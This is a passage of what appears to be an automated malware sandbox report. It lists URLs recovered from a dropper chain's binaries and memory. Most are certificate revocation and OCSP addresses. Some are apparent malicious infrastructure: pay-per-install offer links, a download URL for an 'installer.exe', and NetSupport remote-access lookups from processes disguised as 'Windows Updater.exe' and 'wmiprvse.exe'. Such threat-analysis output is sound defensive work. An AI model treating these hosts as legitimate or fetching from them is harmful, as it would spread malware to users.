                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005842000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000002.2922284466.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmp, MSI5D6E.tmp.21.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005842000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000002.2922284466.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2548000487.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmp, MSI5D6E.tmp.21.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                  Source: a1.exe, 00000014.00000003.2453151386.0000000006ED0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316303508.00000000043CF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000002.2536551108.0000000001C00000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534296256.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534256836.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0=
                                  Source: Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000002.2922284466.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005842000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                  Source: Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005842000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000002.2922284466.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmp, MSI5D6E.tmp.21.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                                  Source: a1.exe, 00000014.00000002.2488308459.00000000011A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                                  Source: a1.exe, 00000014.00000002.2488308459.0000000001140000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab0t=
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=no&o=1627&a=2598&dn=286&spot=1&t=1
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=no&o=1657&a=2598&dn=415&spot=4&t=1
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=no&o=1658&a=2598&dn=416&spot=7&t=1
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=no&o=1661&a=2598&dn=419&spot=3&t=1
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=no&o=1662&a=2598&dn=420&spot=5&t=1
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=no&o=1666&a=2598&dn=428&spot=6&t=1
                                  Source: setup.tmp, 00000004.00000002.4557910495.0000000005955000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=no&o=331&a=2598&dn=244&spot=2&t=17
                                  Source: setup.tmp, 00000004.00000002.4557910495.0000000005955000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4557910495.0000000005976000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=yes&o=1627&a=2598&dn=286&spot=1&t=
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=yes&o=1657&a=2598&dn=415&spot=4&t=
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=yes&o=1658&a=2598&dn=416&spot=7&t=
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=yes&o=1661&a=2598&dn=419&spot=3&t=
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=yes&o=1662&a=2598&dn=420&spot=5&t=
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=yes&o=1666&a=2598&dn=428&spot=6&t=
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=yes&o=331&a=2598&dn=244&spot=2&t=1
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
                                  Source: a1.exe, 00000014.00000003.2318106368.000000000123C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
                                  Source: wmiprvse.exe, 0000000E.00000002.4545412473.0000000000D99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/
                                  Source: wmiprvse.exe, 0000000E.00000002.4545412473.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                  Source: wmiprvse.exe, 0000000E.00000002.4545412473.0000000000DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp41
                                  Source: wmiprvse.exe, 0000000E.00000002.4553318930.0000000005D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp9
                                  Source: wmiprvse.exe, 0000000E.00000002.4553318930.0000000005D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspK
                                  Source: wmiprvse.exe, 0000000E.00000002.4554265373.0000000011194000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                  Source: wmiprvse.exe, 0000000E.00000002.4553318930.0000000005D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspk
                                  Source: ZmWSzgevgt.exe, 00000000.00000003.2005457089.0000000002560000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.exe, 00000000.00000002.4546319029.0000000000AE4000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000002.4555717982.00000000037BD000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000002.4555717982.000000000377A000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000003.2010247622.0000000003490000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000002.4550403877.000000000242C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hammercakes.xyz/ill.php?p=3890&t=47670100&title=cml2ZXItY2l0eS1yaXZhbC1zaG93ZG93bi10cmFpbmVyL
                                  Source: shi4D3B.tmp.33.drString found in binary or memory: http://html4/loose.dtd
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000857000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://kapetownlink.com/installer.exe
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kapetownlink.com/installer.exez10
                                  Source: setup.tmp, 00000004.00000002.4559403605.0000000010038000.00000002.00000001.01000000.00000009.sdmp, setup.tmp, 00000004.00000002.4557123919.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4543921017.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://mitrichsoftware.wordpress.comB
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
                                  Source: a1.exe, 00000014.00000003.2316303508.00000000043CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005842000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2453151386.0000000006ED0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316303508.00000000043CF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000002.2536551108.0000000001C00000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534296256.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534256836.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005842000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2453233427.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2453151386.0000000006ED0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2489356662.0000000004320000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316303508.00000000043CF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490078506.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490509551.00000000061F0000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2485911641.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2353089785.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000002.2536551108.0000000001C00000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534296256.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534256836.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, MSI743D.tmp.21.dr, MSIF8B5.tmp.20.dr, MSI80A8.tmp.21.dr, MSI232D.tmp.21.drString found in binary or memory: http://ocsp.digicert.com0A
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005842000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2548000487.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmp, MSI5D6E.tmp.21.drString found in binary or memory: http://ocsp.digicert.com0C
                                  Source: Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                                  Source: Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000002.2922284466.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005842000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000002.2922284466.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmp, MSI5D6E.tmp.21.drString found in binary or memory: http://ocsp.digicert.com0O
                                  Source: a1.exe, 00000014.00000003.2453151386.0000000006ED0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316303508.00000000043CF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000002.2536551108.0000000001C00000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534296256.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534256836.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0W
                                  Source: a1.exe, 00000014.00000003.2453233427.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2453151386.0000000006ED0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2489356662.0000000004320000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316303508.00000000043CF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490078506.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490509551.00000000061F0000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.000000000435A000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2485911641.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2353089785.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000002.2536551108.0000000001C00000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534296256.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534256836.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, MSI743D.tmp.21.dr, MSIF8B5.tmp.20.dr, MSI80A8.tmp.21.dr, MSI232D.tmp.21.drString found in binary or memory: http://ocsp.digicert.com0X
                                  Source: expand.exe, 0000000A.00000003.2221562251.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                  Source: expand.exe, 0000000A.00000003.2221562251.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                                  Source: expand.exe, 0000000A.00000003.2221562251.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                  Source: expand.exe, 0000000A.00000003.2221562251.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.ncdc.gov.sa0
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
                                  Source: a1.exe, 00000014.00000003.2317424410.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.suscerte.gob.ve0
                                  Source: expand.exe, 0000000A.00000003.2221562251.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                  Source: a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.registradores.org/normativa/index.htm0
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
                                  Source: a1.exe, 00000014.00000002.2488308459.00000000011A5000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2353089785.00000000043AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pstbbk.com
                                  Source: a1.exe, 00000014.00000003.2312873578.00000000043CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pstbbk.com/
